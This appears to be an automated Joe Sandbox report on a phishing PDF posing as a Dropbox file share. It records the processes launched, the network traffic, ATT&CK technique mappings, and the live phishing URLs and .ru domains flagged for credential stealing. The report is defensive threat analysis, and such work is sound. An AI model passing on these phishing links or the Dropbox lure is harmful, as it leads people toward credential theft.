Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/2000292729:1734542240:X0lCKVmzbenQfrsiKz-FVaH0wGrZC2Dr08uWAScPXbQ/8f40fce70d2b43c1/V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22j HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3202sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: V4F.WsVXL0aw8yUZ7Nx0hXp6M.dLjuVtEDqsuNyHM.A-1734544149-1.1.1.1-OEJJHNutEOfWHshmJlEsf6EK.eVoRqVDKWqrQDA_AsU1KjSEhbYvXjiIolNGc22jsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 17:49:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NK60VD7izjfkFcqHBZDOlRao%2Fj3PMbOBoyKjf%2FtNXQGaIWdPiCn9szmD1PFGjeP3eUoPI4wNhM0HP2i96pRps2cMjiBZLFbP6urmMvv%2BbzJzoe3UZIhqWOqT1frGig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1192&min_rtt=1183&rtt_var=463&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2225&delivery_rate=2260317&cwnd=251&unsent_bytes=0&cid=bd5ac74f35fc0e40&ts=385&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8f40fcf8b8d80f79-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1484&rtt_var=742&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4186&recv_bytes=1890&delivery_rate=490591&cwnd=241&unsent_bytes=0&cid=fa67cc643f1ca1e1&ts=10590&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 17:49:19 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: c70ztapzTsTLQSJqw6iFPqx6//vmJuDUkf8=$wF53u1XHn2AnY6uYServer: cloudflareCF-RAY: 8f40fd2298d28cb9-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 17:49:26 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: ix8f7ece7SBl6R0jjyjNureMySGTf+mvnWA=$kT9Vo2WVlfCjD/nnServer: cloudflareCF-RAY: 8f40fd4eed204406-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Dec 2024 17:51:22 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: nJi92hPt3u16uFckGM4gd3LKfUM9iPZVHWA=$KUqPbjB1pb4g2bZvServer: cloudflareCF-RAY: 8f4100287d3d4338-EWRalt-svc: h3=":443"; ma=86400
Source: 77EC63BDA74BD0D0E0426DC8F80085060.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: chromecache_224.17.dr, chromecache_236.17.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_226.17.drString found in binary or memory: http://schema.org/Organization
Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.drString found in binary or memory: http://x1.i.lencr.org/
Source: A file has been sent to you via DROPBOX.pdfString found in binary or memory: https://4R.tatcharc.ru/hdlV/)
Source: chromecache_226.17.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: chromecache_226.17.drString found in binary or memory: https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.c
Source: chromecache_226.17.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: chromecache_226.17.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: chromecache_226.17.drString found in binary or memory: https://onedrive.live.com/about/en-us/
Source: chromecache_226.17.drString found in binary or memory: https://outlook.live.com/owa/
Source: chromecache_226.17.drString found in binary or memory: https://products.office.com/en-us/home
Source: chromecache_226.17.drString found in binary or memory: https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeams
Source: chromecache_226.17.drString found in binary or memory: https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Source: ReaderMessages.4.drString found in binary or memory: https://www.adobe.co
Source: chromecache_226.17.drString found in binary or memory: https://www.onenote.com/
Source: chromecache_226.17.drString found in binary or memory: https://www.skype.com/en/
Source: chromecache_226.17.drString found in binary or memory: https://www.xbox.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: classification engineClassification label: mal56.winPDF@44/95@41/16
Source: A file has been sent to you via DROPBOX.pdfInitial sample: https://4r.tatcharc.ru/hdlv/
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-18 12-48-35-092.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\A file has been sent to you via DROPBOX.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1728,i,8237484978916821895,3345354816588044964,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://4R.tatcharc.ru/hdlV/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1992,i,12933209959549165544,4641154033968783078,262144 /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1728,i,8237484978916821895,3345354816588044964,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1992,i,12933209959549165544,4641154033968783078,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: A file has been sent to you via DROPBOX.pdfInitial sample: PDF keyword /JS count = 0
Source: A file has been sent to you via DROPBOX.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: A file has been sent to you via DROPBOX.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link
Windows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://4r.tatcharc.ru/hdlV/100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://4R.tatcharc.ru/hdlV/)100%Avira URL Cloudphishing
https://4r.tatcharc.ru/favicon.ico100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    ooc-g2.tm-4.office.com
    52.98.61.34
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        MRS-efz.ms-acdc.office.com
        52.98.200.242
        truefalse
          high
          4r.tatcharc.ru
          172.67.153.247
          truetrue
            unknown
            code.jquery.com
            151.101.66.137
            truefalse
              high
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                challenges.cloudflare.com
                104.18.95.41
                truefalse
                  high
                  www.google.com
                  172.217.19.228
                  truefalse
                    high
                    kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru
                    104.21.16.1
                    truefalse
                      unknown
                      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                      217.20.58.100
                      truefalse
                        high
                        x1.i.lencr.org
                        unknown
                        unknownfalse
                          high
                          outlook.live.com
                          unknown
                          unknownfalse
                            high
                            assets.onestore.ms
                            unknown
                            unknownfalse
                              high
                              ajax.aspnetcdn.com
                              unknown
                              unknownfalse
                                high
                                c.s-microsoft.com
                                unknown
                                unknownfalse
                                  high
                                  www.outlook.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f40fce70d2b43c1/1734544156658/pyZm-HMUItdel49false
                                      high
                                      https://outlook.live.com/owa/false
                                        high
                                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                          high
                                          https://4r.tatcharc.ru/favicon.icofalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                            high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f40fce70d2b43c1&lang=autofalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f40fce70d2b43c1/1734544156660/e48b08b797227e0d4a3633050dffc9324e8e3ede998da3808dab9e337ca5ef1b/WEQGbHJaCLJFXt6false
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                  high
                                                  https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/0zt9v/0x4AAAAAAA0H1DSPEE75_Afo/auto/fbE/normal/auto/false
                                                      high
                                                      https://4r.tatcharc.ru/hdlV/true
                                                      • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                                      unknown
                                                      https://a.nel.cloudflare.com/report/v4?s=NK60VD7izjfkFcqHBZDOlRao%2Fj3PMbOBoyKjf%2FtNXQGaIWdPiCn9szmD1PFGjeP3eUoPI4wNhM0HP2i96pRps2cMjiBZLFbP6urmMvv%2BbzJzoe3UZIhqWOqT1frGig%3D%3Dfalse
                                                        high
                                                        https://outlook.live.com/false
                                                          high
                                                          https://www.outlook.com/false
                                                            high
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.7.drfalse
                                                              high
                                                              https://www.skype.com/en/chromecache_226.17.drfalse
                                                                high
                                                                https://products.office.com/en-us/homechromecache_226.17.drfalse
                                                                  high
                                                                  https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.cchromecache_226.17.drfalse
                                                                    high
                                                                    https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jschromecache_226.17.drfalse
                                                                      high
                                                                      https://onedrive.live.com/about/en-us/chromecache_226.17.drfalse
                                                                        high
                                                                        https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeamschromecache_226.17.drfalse
                                                                          high
                                                                          https://www.adobe.coReaderMessages.4.drfalse
                                                                            high
                                                                            https://www.onenote.com/chromecache_226.17.drfalse
                                                                              high
                                                                              https://www.xbox.com/chromecache_226.17.drfalse
                                                                                high
                                                                                http://schema.org/Organizationchromecache_226.17.drfalse
                                                                                  high
                                                                                  https://4R.tatcharc.ru/hdlV/)A file has been sent to you via DROPBOX.pdffalse
                                                                                  • Avira URL Cloud: phishing
                                                                                  unknown
                                                                                  http://github.com/requirejs/almond/LICENSEchromecache_224.17.dr, chromecache_236.17.drfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    172.217.19.228
                                                                                    www.google.comUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    104.18.94.41
                                                                                    unknownUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    151.101.66.137
                                                                                    code.jquery.comUnited States
                                                                                    54113FASTLYUSfalse
                                                                                    151.101.194.137
                                                                                    unknownUnited States
                                                                                    54113FASTLYUSfalse
                                                                                    35.190.80.1
                                                                                    a.nel.cloudflare.comUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    52.98.200.242
                                                                                    MRS-efz.ms-acdc.office.comUnited States
                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                    52.98.61.34
                                                                                    ooc-g2.tm-4.office.comUnited States
                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                    104.17.24.14
                                                                                    unknownUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    104.21.16.1
                                                                                    kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ruUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    104.18.95.41
                                                                                    challenges.cloudflare.comUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    239.255.255.250
                                                                                    unknownReserved
                                                                                    unknownunknownfalse
                                                                                    172.67.153.247
                                                                                    4r.tatcharc.ruUnited States
                                                                                    13335CLOUDFLARENETUStrue
                                                                                    104.17.25.14
                                                                                    cdnjs.cloudflare.comUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    IP
                                                                                    192.168.2.17
                                                                                    192.168.2.7
                                                                                    192.168.2.18
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1577794
                                                                                    Start date and time:2024-12-18 18:47:36 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 5m 50s
